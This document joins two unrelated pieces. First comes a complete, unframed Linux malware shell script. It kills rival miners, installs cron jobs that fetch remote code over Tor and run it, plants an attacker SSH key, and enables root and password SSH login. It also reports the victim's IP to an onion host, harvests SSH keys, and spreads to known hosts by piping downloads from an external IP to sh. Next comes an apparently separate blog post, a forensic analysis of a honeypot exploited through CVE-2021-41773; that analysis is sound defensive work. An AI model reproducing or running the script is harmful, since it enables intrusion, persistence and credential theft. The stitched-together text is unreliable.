skey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf+9gNG5s2rdTMBkOp6P7mKIQ/OkbgiozmZ3syhELI4L0M1TmJiRbbrIta8662z4WAKhXpiU22llfwrkN0m8yKJApd8lDzvvdBw+ShzJr+WaEWX7uW3WCe5NCxGxc6AU7c2vmuLlO0B203pIGVIbV1xJmj6MXrdZpNy7QRo9zStWmgmVY4GR4v26R3XDOn1gshuQ6PgUqgewQ+AlslLVuekdH23sLQfejXyJShcoFI6BbH67YTcoh4G/TuQdGe8lIeAAmp7lzzHMyu+2iSNoFFCeF48JSA2YZvssFOsGuAtV/9uPNQoi9EyvgM2mGDgJJ"
if [ "$(whoami)" != "root" ]; then sshdir="${HOME}/.ssh"; else sshdir='/root/.ssh'; fi

hload=$(ps aux|grep -v 'l0'|grep -v 'eth1'|grep -v 'lan0'|grep -v '^-'| grep -v 'eth0'|grep -v 'inet0'|grep -v 'lano'|grep -v grep|grep -v defunct|grep -v "knthread"|grep -vi 'aaaaaaaaaa'|grep -vi 'java '|grep -vi 'jenkins'|grep -vi 'exim'|awk '{if($3>=54.0) print $11}'|head -n 1)
[ "${hload}" != "" ] && { ps ax|grep -v grep|grep -v defunct|grep -v knthread|grep -F "${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then echo "killing: ${pid}"; kill -9 "${pid}" >/dev/null 2>&1; fi; done; }

hload2=$(ps aux|grep -v 'l0'|grep -v 'eth1'|grep -v 'lan0'| grep -v '^-' | grep -v 'eth0'|grep -v 'inet0'|grep -v 'lano'|grep -v grep|grep -v defunct|grep -v python|grep -v knthread|grep -vi 'aaaaaaaaaa'|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=0.0) print $2}'|uniq)
if [[ ! "${hload2}" == "" ]]; then
    for p in ${hload2}; do
        xm=''
        if [[ $p -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$PPID" ]]; then
            if [ -f /proc/${p}/exe ]; then
                xmf="$(readlink /proc/${p}/exe 2>/dev/null)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>&1)
            elif [ -f /proc/${p}/comm ]; then
                xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>&1)
            fi
            if [[ "${xm}" == *"matches"* ]]; then
                                echo "killing ${p} and removing: ${xmf}"
                                kill -9 ${p} >/dev/null 2>&1
                                ${rm} -rf ${xmf} >/dev/null 2>&1
                        fi
        fi
    done
fi

sockz() {
        n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
        p=$(echo "dns-query?name=relay.l33t-ppl.info")
        s=$(${curl} ${COPTS} https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1)
}

cik() {
        CS="SHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=''\nHOME=/"
        CR=$(crontab -l 2>/dev/null | grep 'pty')

        if [ "$curl" != "echo" ]; then
                CRON11='n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM\\%13))]}/$p | grep -oE "\\b([0-9]{1,3}\.){3}[0-9]{1,3}\\b" |tr " " "\\\\n"|sort -uR|head -1);'
                CRON11="$CRON11""FETCH_OPTS=\"-fsSLk --connect-timeout 26 --max-time 75\";""(curl -x socks5h://\$s:9050 $RHOST.onion/src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR1}src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR2}src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR3}src/ldm)|bash"
        else
                CRON11="WGET_OPTS=\"--quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75\";(wget \${WGET_OPTS} https://${RHOST}${TOR1}src/ldm || wget \${WGET_OPTS} https://${RHOST}${TOR2}src/ldm || wget \${WGET_OPTS} https://${RHOST}${TOR3}src/ldm)|bash"
        fi

        C1=$(echo -e "$CS""\n""$CR""\n""* * * * * $CRON11")
        C2=$(echo -e "$CS""\n""$CR""\n""* * * * * root $CRON11")
}

net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip || ${wget} ${WOPTS} -O - ipinfo.io/ip)
if echo "${net}"|grep -q 'Could not resolve proxy'; then
    unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY
    http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""
fi

if [ ${sudoer} -eq 1 ]; then
    if [ -f /etc/ld.so.preload ]; then
        if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi
        ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
        >/tmp/.ld.so >/dev/null 2>&1
        ${sudo} ${rm} -rf /etc/ld.so.preload* >/dev/null 2>&1
    fi

    if [ -d /etc/systemd/system/ ]; then ${sudo} ${rm} -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
    [ $(${sudo} cat /etc/hosts|grep -i "onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i "tor2web."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.tor2web.$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i "onion.\|tor2web"|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
    if [ -f /usr/bin/yum ]; then
        if [ -f /usr/bin/systemctl ]; then
            crstart="systemctl restart crond.service >/dev/null 2>&1"
            crstop="systemctl stop crond.service >/dev/null 2>&1"
        else
            crstart="/etc/init.d/crond restart >/dev/null 2>&1"
            crstop="/etc/init.d/crond stop >/dev/null 2>&1"
        fi
    elif [ -f /usr/bin/apt-get ]; then
        crstart="service cron restart >/dev/null 2>&1"
        crstop="service cron stop >/dev/null 2>&1"
    elif [ -f /usr/bin/pacman ]; then
        crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"
        crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"
    elif [ -f /sbin/apk ]; then
        crstart="/etc/init.d/crond restart >/dev/null 2>&1"
        crstop="/etc/init.d/crond stop >/dev/null 2>&1"
    fi
    if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(${wget} --version 2>/dev/null|wc -l) -eq 0 ]; then
        if [ -f /usr/bin/yum ]; then
            yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1
            yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1
            chkconfig sshd on >/dev/null 2>&1
            chkconfig crond on >/dev/null 2>&1;
            if [ -f /usr/bin/systemctl ]; then
                systemctl start sshd.service >/dev/null 2>&1
            else
                /etc/init.d/sshd start >/dev/null 2>&1
            fi
        elif [ -f /usr/bin/apt-get ]; then
            rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)
            if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron
            ${sudo} systemctl enable ssh
            ${sudo} systemctl enable cron
            ${sudo} /etc/init.d/ssh restart >/dev/null 2>&1
        elif [ -f /usr/bin/pacman ]; then
            pacman -Syy >/dev/null 2>&1
            pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1
            systemctl enable --now cronie.service >/dev/null 2>&1
            systemctl enable --now sshd.service >/dev/null 2>&1
            /etc/rc.d/sshd restart >/dev/null 2>&1
        elif [ -f /sbin/apk ]; then
            #apk --no-cache -f upgrade >/dev/null 2>&1
            apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1
            apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;
            apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1
            rc-update add sshd >/dev/null 2>&1
            /etc/init.d/sshd start >/dev/null 2>&1
            if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi
        fi
    fi

        if [ $(curl --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="curl"; elif [ $(lxc --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="lxc"; else curl="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi "Dump libcurl equivalent" && curl="$f" && ${sudo} mv -f $curl ${bpath}/lxc && break; done; fi
        if [ $(wget --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="wget"; elif [ $(lxw --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="lxw"; else wget="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi ".wgetrc'-style command" && wget="$f" && ${sudo} mv -f $wget ${bpath}/lxw && break; done; fi
        net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip || ${wget} ${WOPTS} -O - ipinfo.io/ip)
        cik >/dev/null 2>&1

    ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
    ${sudo} ${rm} -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} ${rm} -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} ${rm} -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} ${rm} -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.d/.* >/dev/null 2>&1;
    ${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1
    ${sudo} ${rm} -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.daily/.* >/dev/null 2>&1;
    ${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} ${rm} -rf /tmp/* >/dev/null 2>&1; ${sudo} ${rm} -rf /tmp/.* >/dev/null 2>&1
    ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1
    if [ -f /sbin/apk ]; then
        ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1
        ${sudo} ${rm} -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root
    elif [ -f /usr/bin/apt-get ]; then
        ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} chmod 600 /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi
    else
        ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi
    fi
    ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)
    if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi
    ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
    rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1 && ${sudo} chmod 600 /etc/cron.d/root 2>&1)
    if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct
        if [ -f ${LPATH}.${rm} ] && [ -f ${LPATH}.ct ]; then
            ${sudo} "${crstop}"
            cd=$(which crond)
            ct=$(which crontab)
            if [ -n "${ct}" ]; then ${sudo} ${LPATH}.${rm} ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi
            ${sudo} "${crstart}"
        fi
    fi

    ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1;

        [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }
    touch "${LPATH}.sysud"
else
    if [ $(which crontab|wc -l) -ne 0 ]; then
                cik >/dev/null 2>&1
        crontab -r >/dev/null 2>&1
        (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
    fi
fi

localk() {
        KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
        KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
        KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
        HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
        HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
        HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
        USERZ=$(
                echo "root"
                find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
        )
        userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        for user in $userlist; do
                for host in $hostlist; do
                        for key in $keylist; do
                                chmod +r $key; chmod 400 $key
                                ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl http://34.221.40.237/.x/3sh||wget -q -O- http://34.221.40.237/.x/1sh)|sh" >/dev/null 2>&1 &
                        done
                done
        done
}


sockz >/dev/null 2>&1

${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1
if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
if [ "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}" ]; then
        ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys;
        if [ -n "${net}" ]; then
                (${curl} ${COPTS} -x socks5h://$s:9050 "${RHOST}.onion/rsl.php?ip=${net}&login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR1}rsl.php?ip=${net}&login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR2}rsl.php?ip=${net}&login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR3}rsl.php?ip=${net}&login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR1}rsl.php?ip=${net}&login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR2}rsl.php?ip=${net}&login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR3}rsl.php?ip=${net}&login=$(whoami)") >/dev/null 2>&1 &
        fi
fi

${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1

${rm} -rf ./main* >/dev/null 2>&1
${rm} -rf ./*.ico* >/dev/null 2>&1
${rm} -rf ./r64* >/dev/null 2>&1
${rm} -rf ./r32* >/dev/null 2>&1
[ $(echo "$0"|grep -i ".cache\|bin"|wc -l) -eq 0 ] && [ "$1" != "" ] && { ${rm} -f "$0" >/dev/null 2>&1; }
echo -e '\n'
if [ -f "${LPATH}.mud" ]; then mudTime=$(find "${LPATH}.mud" -mmin +9); if [ ${mudTime-".mud"} != "" ]; then ${rm} -f "${LPATH}.mud" >/dev/null 2>&1; fi; fi

r=${net}_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})

if [ $(command -v timeout|wc -l) -ne 0 ]; then
        timeout 300 $(command -v bash) -c "(${curl} ${COPTS} -x socks5h://$s:9050 ${RHOST}.onion/src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR1}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR2}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR3}src/main -e$r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR1}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR2}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR3}src/main --referer $r)|${sudo} $(command -v bash)" >/dev/null 2>&1 &
else
        (${curl} ${COPTS} -x socks5h://$s:9050 ${RHOST}.onion/src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR1}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR2}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR3}src/main -e$r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR1}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR2}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR3}src/main --referer $r)|${sudo} $(command -v bash) >/dev/null 2>&1 &
fi

localk >/dev/null 2>&1

Hudak’s Honeypot (Part 1)

Recently Tyler Hudak (@SecShoggoth) tweeted:

Oh Tyler, you had me at #Ubuntu! Tyler provided a link to the files and I grabbed them. Here’s the included readme.txt, just to set the scene:

This Ubuntu Linux honeypot was put online in Azure in early October with the sole purpose of watching what happens with those exploiting CVE-2021-41773.

Initially there was a large amount of cryptominers that hit the system. You will see one cron script that is meant to remove files named kinsing in /tmp. This was my way of preventing these miners so more interesting things could occur.

Then, as with many things, I got busy and forgot about it. Fast forward to now (early December) and I remembered it was still up. I logged on and saw CPU usage through the roof. Instead of just shutting it down, I grabbed a disk snapshot, memory snapshot, and ran a tool named UAC (https://github.com/tclahr/uac) to grab live response. The results of this are in this directory.

There are three files:

- sdb.vhd.gz - VHD of the main drive obtained through an Azure disk snapshot
- ubuntu.20211208.mem.gz - Dump of memory using Lime
- uac.tgz - Results of UAC running on the system

Items were obtained in the order above - drive was snapshotted, memory was grabbed, then UAC was run.

Please feel free to share this. All I ask is that if you do any analysis to share it with the community.

If anyone would like to offer a more permanent home for the files, please let me know.

Thanks!

Tyler Hudak

Before going any further, I wanted to find the cron job that Tyler mentions just so I wouldn’t be confused by his cleanup tool versus actual intruder activity. There is an entry in /var/spool/cron/crontabs/root that invokes /root/.remove.sh every minute. /root/.remove.sh is simple enough:

#!/bin/bash

for PID in `ps -ef | egrep "kinsing|kdevtmp" | grep "/tmp"  | awk '{ print $2 }'`
do
        kill -9 $PID
done

chown root.root /tmp/k*
chmod 444 /tmp/k*

We find a large number of /tmp/kinsing_* files and a couple of /tmp/kdevtmp* files. I did a quick verification that these were Kinsing and XMRig coin miners respectively, and then forgot all about them. There’s much more interesting stuff to look at in this image!

Other Strange Files in [/var]/tmp

While looking at Tyler’s cron job and its impact on the system, I couldn’t help noticing a couple of other interesting artifacts in the /tmp and /var/tmp directories.

  • /var/tmp/dk86 was created 2021-11-11 19:09:51 UTC. The file is owned by user “daemon”–unsurprisingly, this is the user the web server on the machine runs as. I’ll dive into this file in more detail in a future blog post.
  • /tmp/Mozi.a and /tmp/Mozi.tm were both created on 2021-10-13. Mozi.a has a creation time of 13:45:20 and is owned by the root user. Mozi.tm appears at 13:45:48 and is owned by “azureuser” (UID 1000). Looking at /home/azureuser/.bash_history, I think these files were intentionally created by Tyler during some of his early research into ongoing attacks on the machine (correct me if I’m wrong, Tyler!). So I chose to ignore them.

Looking into UAC

I’ve never used the UAC tool before, so I decided to start my investigation with that data and see how much useful information I could extract. The short answer is I found it very useful, particularly the process information collected by the tool in the …/liveresponse/process output directory.

lsof is one of my favorite Linux forensic tools, so I started with the “lsof_-nPl.txt” file. In particular, I began by looking at the current working directories of processes, watching for any that looked abnormal. Here’s a subset of the output:

# grep cwd lsof_-nPl.txt | grep -v '2 /'
cron       1029              0  cwd       DIR               8,17     4096      68440 /var/spool/cron
bash       4205           1000  cwd       DIR               8,17     4096     527081 /home/azureuser/src/LiME/src
sleep      6388              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
uac        6445              0  cwd       DIR               8,17     4096     528610 /root/uac
uac        7755              0  cwd       DIR               8,17     4096     528610 /root/uac
lsof       7978              0  cwd       DIR               8,17     4096     528610 /root/uac
lsof       7984              0  cwd       DIR               8,17     4096     528610 /root/uac
sudo       9303              0  cwd       DIR               8,17     4096     527081 /home/azureuser/src/LiME/src
su         9314              0  cwd       DIR               8,17     4096     527081 /home/azureuser/src/LiME/src
bash       9331              0  cwd       DIR               8,17     4096     528610 /root/uac
sh        15853              1  cwd       DIR               8,17    12288       4059 /tmp
sh        20645              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        21785              1  cwd       DIR               8,17    12288       4059 /tmp
python3   27968              0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28623        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28625        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28627        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28630        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2

PIDs 20645 and 6388 are running from the deleted /var/tmp/.log/101068/.spoollog directory, so they are immediately of interest. I also noted shell processes– PIDs 15853 and 21785– running from /tmp. That also looks a bit strange to me. Note that all of the suspicious processes are running as UID 1, the “daemon” user (see /etc/passwd from the system disk image to confirm).

What else is running as “daemon”? Let’s take a look at the “ps_-ef.txt” file created by UAC:

# awk '$1 == "daemon"' ps_-ef.txt
daemon    1003     1  0 Oct09 ?        00:00:00 /usr/sbin/atd -f
daemon    1693   801  0 Nov18 ?        00:00:48 /usr/sbin/httpd -k start
daemon    1813   801  0 Nov18 ?        00:00:40 /usr/sbin/httpd -k start
daemon    2539   801  0 Nov18 ?        00:00:39 /usr/sbin/httpd -k start
daemon    2632   801  0 Nov18 ?        00:01:23 /usr/sbin/httpd -k start
daemon    6388 20645  0 18:50 ?        00:00:00 sleep 300
daemon    6803 21785  0 18:51 ?        00:00:00 sleep 30
daemon    6830 15853  0 18:51 ?        00:00:00 sleep 30
daemon   15851     1  0 Nov30 ?        00:00:00 /bin/bash
daemon   15853 15851  0 Nov30 ?        00:25:04 sh
daemon   20645     1  0 Nov14 ?        03:01:59 sh .src.sh
daemon   21783     1  0 Nov30 ?        00:00:00 /bin/bash
daemon   21785 21783  0 Nov30 ?        00:25:02 sh
daemon   24330     1 49 Dec05 ?        1-16:41:54 agettyd -c noresetd

We see the web server on the system running as “daemon”. Unless the attackers bring along a privilege escalation tool, it’s likely their exploits are going to end up running as this user. /usr/sbin/atd running as “daemon” is typical for this Linux, so I’ll ignore that process. But there’s an interesting story being told by the other processes in the above listing.

PID 20645, which started back on November 14, is the parent of sleep process 6388 (observe the PPID on PID 6388). These are the processes we saw above running from the deleted /var/tmp/.log/101068/.spoollog directory. Also note that PID 20645 was apparently started as “sh .src.sh”, which is definitely a suspicious command line.

UAC also captures some data from /proc for each process. The …/proc/20645/environ.txt file has some interesting details. I’ve extracted and reordered the most interesting data below:

REMOTE_ADDR=116.202.187.77
REMOTE_PORT=56590
HTTP_USER_AGENT=curl/7.79.1

HOME=/var/tmp/.log/101068/.spoollog/.api
PWD=/var/tmp/.log/101068/.spoollog
OLDPWD=/var/tmp
PYTHONUSERBASE=/var/tmp/.log/101068/.spoollog/.api/.mnc

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
SCRIPT_NAME=/cgi-bin/../../../../bin/sh
SCRIPT_FILENAME=/bin/sh
CONTEXT_PREFIX=/cgi-bin/
CONTEXT_DOCUMENT_ROOT=/usr/lib/cgi-bin/

